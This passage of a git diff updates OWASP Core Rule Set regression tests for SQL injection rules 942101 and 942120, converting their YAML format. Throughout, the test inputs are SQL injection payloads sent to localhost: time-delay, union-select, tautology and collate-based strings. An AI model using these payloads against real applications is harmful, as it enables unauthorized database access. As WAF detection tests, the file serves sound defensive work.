+ headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 5 desc: "Simple function call" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/sleep(20)" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 6 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 7 desc: "SQL Injection at the last segment of the path (request_basename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24'union+all+select+1,2,3+from+aa" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24'union+all+select+1,2,3+from+aa" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 8 desc: "SQL Injection inside the path (request_filename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 9 desc: "SQL Injection inside the path with comment block (request_filename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/%2A/%2A/2+union+all/bar" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/%2A/%2A/2+union+all/bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 10 desc: "Negative test with incomplete SQL command inside the path" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/9'union+all/bar" - version: HTTP/1.0 - output: - no_log_contains: id "942101" - - test_title: 942101-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/9'union+all/bar" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942101] + - test_id: 11 desc: "Negative test with complete SQL command inside the path, but without comma" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" - version: HTTP/1.0 - output: - no_log_contains: id "942101" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942101] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index d6f008ecc..39094ed08 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -1,674 +1,671 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None - enabled: true - name: 942120.yaml +rule_id: 942120 tests: - - test_title: 942120-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=blahblah&var2=LIKE%20NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=blahblah&var2=LIKE%20NULL" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 2 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=RegExp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=RegExp" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 3 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ">>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ">>" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 4 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%26%26" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%26%26" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 5 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "<<" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "<<" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 6 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "%21%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "%21%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 7 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "||" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "||" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 8 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "XOR" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "XOR" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 9 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%3C%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%3C%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 10 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "IS NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "IS NULL" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 11 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "in (0,1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "in (0,1)" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 12 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "in (2147483647,-1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "in (2147483647,-1)" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 13 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%3C%3D%3E" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%3C%3D%3E" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 14 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "regexp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "regexp" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 15 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RLIKE" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RLIKE" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 16 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "<>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "<>" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 17 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 18 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+IN+%28815914%2C+815913%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+IN+%28815914%2C+815913%29%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 19 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 20 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay= in ( Aa,- Ab-, and Ac)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay= in ( Aa,- Ab-, and Ac)" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 21 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "%3E%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "%3E%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 22 desc: "SQL Injection Attack: not between * and " stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 23 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=z'or%20email%20notnull--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=z'or%20email%20notnull--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 24 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 25 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 26 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 27 desc: "SQLite collate nocase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20nocase--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 28 desc: "SQLite collate nocase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20nocase--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 29 desc: "SQL collate`nocase`" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%60nocase%60--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 